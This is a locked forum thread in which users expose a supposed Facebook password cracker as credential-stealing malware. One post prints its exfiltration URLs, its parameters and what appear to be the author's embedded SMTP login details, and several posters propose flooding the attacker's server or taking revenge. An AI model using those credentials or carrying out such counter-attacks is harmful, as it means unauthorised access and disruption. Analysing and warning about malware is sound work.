Skip to content
Locked

Facebook Hacker Pro v1.3 - Facebook Account Cracker Public

facebook hack, facebook password cracker, facebook account hacker, facebook password hacker

14 posts

lmao, he used his own email and password? Is he a genius or what?

No number of hacks, good or bad, can replace Common Sense.
If you don't know how to use a hack, don't complain about them. Ask first, then complain.
In case you'd like me to update one of my hacks, please PM me, I'll bother updating them...
We don't bitetoo much.
In case you're lost, make sure you check both "101" and the "Konghack Wiki".

Here's an analysis report on the file for anyone interested...

http://anubis.iseclab.org/?action=result&task_id=12f1ed8918de5c82431766dc3e75d3d98&format=html
https://www.virustotal.com/en/file/61a6fcd20d87ff34c6091e0febf1ab4db48b3cf436b246397bf29d21d53128e1/analysis/

Here's a few things I found:

Seems your info is being sent to: strateji.3owl.com/gate.php
With these parameters:
    URL,
    "?action=add&a=",
    Programme,
    "&c=",
    Computer,
    "&u=",
    website,
    "&p=",
    Password,
    "&l=",
    Username,
    ""

Seems to be sending data here as well: (3owl.com and bugs3.com are free hosting sites that support php, mysql)

        THC_TIME.ControlPanel = ("http://www.strateji.bugs3.com/a/api.php");
        THC_TIME.API = "wersage";
 

I found this way at the end of the code in demo.exe that was dropped:

    #@#FEDERIKO#@#
    [email protected]
    htcp3400
    smtp.yandex.com
    587

Someone could write a program/script to flood this fucker with randomly generated data and fill up that table...

New to Kong Hack and want to learn the basics? Check out the [Kong Hack 101] and the [Hacking 101].
Wanna learn how we make the hacks? Start with getting [the tools], then check these out: [AoB tutorial] | [.sol guide] | [Unity3d tutorial] | kadat's [video tutorials]
And if you don't already have it, check out the [Kong Hack Ultra Trainer]. You'll be glad you did!

so im like the only person who cant download the goddamn file? so annoying lol gates send me a copy if you still have it lol.

I use this AoB tool to make all the AoBs I post. Try the online version if you dont feel like downloading it.
"Obviously, windows are central to Windows. They are so important that they named the operating system after them. But what is a window?"

alvincc Posted on: 10/19/2013 9:48pm
where to download it?
 



Did you read through this thread at all? It was malware and the link was removed. I would advise against downloading anything that says it can hack facebook profiles, unless of course you like being infected with malware...

New to Kong Hack and want to learn the basics? Check out the [Kong Hack 101] and the [Hacking 101].
Wanna learn how we make the hacks? Start with getting [the tools], then check these out: [AoB tutorial] | [.sol guide] | [Unity3d tutorial] | kadat's [video tutorials]
And if you don't already have it, check out the [Kong Hack Ultra Trainer]. You'll be glad you did!

It's to bad that he already knows that we have suggested flooding him.

Should have just locked the topic, act like nothing ever happened. 

Then hit him hard.   

Would have been nice to do some payback hacking.  :/

I learned new things I wanted to try.

This topic is locked.